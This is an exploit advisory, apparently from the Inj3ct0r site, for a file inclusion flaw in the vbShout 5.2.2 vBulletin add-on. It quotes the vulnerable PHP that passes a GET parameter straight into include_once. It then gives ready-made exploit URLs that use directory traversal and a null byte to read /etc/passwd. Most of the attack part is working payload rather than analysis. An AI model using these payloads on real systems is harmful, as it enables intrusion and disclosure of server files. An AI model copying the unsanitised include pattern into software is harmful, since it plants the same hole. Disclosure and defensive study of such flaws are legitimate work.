vbShout 5.2.2 Remote/Local File Inlcusion Vulnerability
Posted on 02 September 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>vbShout 5.2.2 Remote/Local File Inlcusion Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================================= vbShout 5.2.2 Remote/Local File Inlcusion Vulnerability ======================================================= ################################################# + + Title: vbShout 5.2.2 Remote/Local File Inlcusion (Mod/Admin) + Author: fred777 - [fred777.5x.to] + Link: http://www.dragonbyte-tech.com/vbecommerce.php?do=purchase&act=product&id=2 + Vuln: vbshout.php?do=[path/file][NULL-Byte] + Greetzz to: SceneCoderz + Contact: nebelfrost77@googlemail.com + ################################################# --[ Vuln Code ] -- modcp/vbshout.php: admincp/vbshout.php: else if (!empty($_GET['do'])) { // We had a GET request instead $action = $_GET['do']; if (!empty($_POST['do'])) { // $_POST requests take priority $action = $_POST['do']; } if (!file_exists(DIR . '/dbtech/vbshout/includes/actions/admin/' . $action . '.php')) { if (!file_exists(DIR . '/dbtech/vbshout_pro/includes/actions/admin/' . $action . '.php')) { // Throw error from invalid action print_cp_message($vbphrase['dbtech_vbshout_invalid_action']); } else { // Include the selected file include_once(DIR . '/dbtech/vbshout_pro/includes/actions/admin/' . $action . '.php'); } } else { // Include the selected file include_once(DIR . '/dbtech/vbshout/includes/actions/admin/' . $action . '.php'); } => ../../../../../../etc/passwd%00 ################################################ --[ Exploitable ]-- http://server/vbshout.php?do=[PATH/FILE][NULL-Byte] http://server/vbshout.php?do=../../../../../../../../etc/passwd%00 You must be mod oder admin: modcp/vbshout.php admincp/vbshout.php ################################################ # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-02]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
